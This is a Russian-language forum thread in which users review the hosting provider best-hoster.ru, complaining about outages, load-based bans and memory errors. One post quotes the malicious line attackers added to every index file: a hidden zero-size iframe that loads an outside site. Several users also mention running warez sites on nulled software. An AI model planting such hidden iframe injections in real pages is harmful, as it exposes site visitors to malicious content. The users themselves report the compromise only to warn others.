best-hoster.ru - давайте обсудим данный хостинг в этой ветке!)

Статус
В этой теме нельзя размещать новые ответы.
А у меня самое долгое ожидание ответа было ето 11 минут хотя задавал вопросы я и в час ночи и рано утром,я хостом доволен но вот бан за молейшую нагрузку ето уже слишком
 
а у себя на сайтах никто не замечал фреймов? я вот вчера в коде ковырялся смотрю фрейм... а сегодня проверяю почту письмо от бест-хостера типа поступает много жалоб о взломе сайтов и просят сменить пароли...
 
  • Заблокирован
  • #53
а у себя на сайтах никто не замечал фреймов? я вот вчера в коде ковырялся смотрю фрейм... а сегодня проверяю почту письмо от бест-хостера типа поступает много жалоб о взломе сайтов и просят сменить пароли...

Да письмо тоже получил и проверил сайтики, но ничего подозрительного не увидел.
 
проверяемся, меняем пароли и лезем в спанель, где блочим, кем-то разрешенный анонимный доступ на фтп
вот такую строчку дописали во все файлы в индексе:
Код:
<html><body onload="<script>document.write(unescape("<iframe src="http://tosto-vik.ru/index.php" width="0" height="0" style="display:none;"></iframe>"));</script>"</body></html>
что там на сайте не смотрел, да и особого желания нет :)
хорошо, что wordpress заткнулся от такой модификации, так бы и не заметил.
 
Сегодня спонтанно перестают грузить некоторые (многие) страницы блогов на ВП. Либо вообще белый экран, либо ошибка вида
Код:
Fatal error: Out of memory (allocated 18874368) (tried to allocate 30720 bytes) in
Неприятно.

Добавлено через 17 минут
Пишу им.
Добавление php_value memory_limit 64M в htaccess не помогло.
...
Да и до этого подобных проблем не было. Похоже проблемы с сервером у вас, вероятно его кто-то из клиентов сильно перегружает.
...
При том что грузится из 10 попыток 1-2 раза нормально, 2-3 раза с "
Fatal error: Out of memory (allocated 18874368) (tried to allocate 30720 bytes) in /home/stroit/public_html/wp-includes/template-loader.php on line 29" , а остальное - просто белый экран.

На что приходит гениальный ответ.

Приветствую, *****!

нет, на сервере проблем нет, не знаю в чем может быть сложность.

Евгений Фотон
Специалист отдела тех. поддержки.
ООО "Группа Компаний Бест-Хостер"
Неприятно.
 
  • Заблокирован
  • #56
У них вчера были проблема, после чего вообще не грузились сайтики, так как во все сайты с файлом index. - дописка, после чего хостер прислал письмо о смене пароля.. правда откатили на удачную конфигурация. Так что размещая серьезные на нем проекты зудумайтесь а стоит ли?!
 
У них часто бывает 502 ошибка
 
у меня варезник стоял там, в день неработал примерно 30 - 50 минут. у них постоянно технические работы или перезагружают сервер.
у друга потом стоял варезник. его закрыли без предупреждения, обосновали что стояла ДЛЕ нуленная.
 
Сейчас перетаскиваю отттуда сайт. Пока был пустой, было всё в норме. Сейчас чуть нагрузка пошла (до 100 онлайн одновременно), пошли постоянные отключения за превышение нагрузки сервера.

Саппорт как раз в остальном на высоте. Ответы в тикетах фактически мнгновенны, помочь честно пытаются.

Резюме. Для сайтов с маленькой нагрузкой вполне себе прилично. Если что-то не то что даже серьезное, но хоть слегка посещаемое (где то от 80 онлайн) начинаются проблемы.

ЗЫ. Связка перегружающая их сервер - Джумла+СМФ
 
Совсем недавно наткнулся на этот хост :) думал уже брать, а тут на форуме смотрю тема и хостинг просто критикуют с отрицательной стороны )). Вот хочу спросить так стоит ли брать этот хост под варез сайт или нет?? И если нет, то какой самый оптимальный вариант примерно по такой же цене?
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху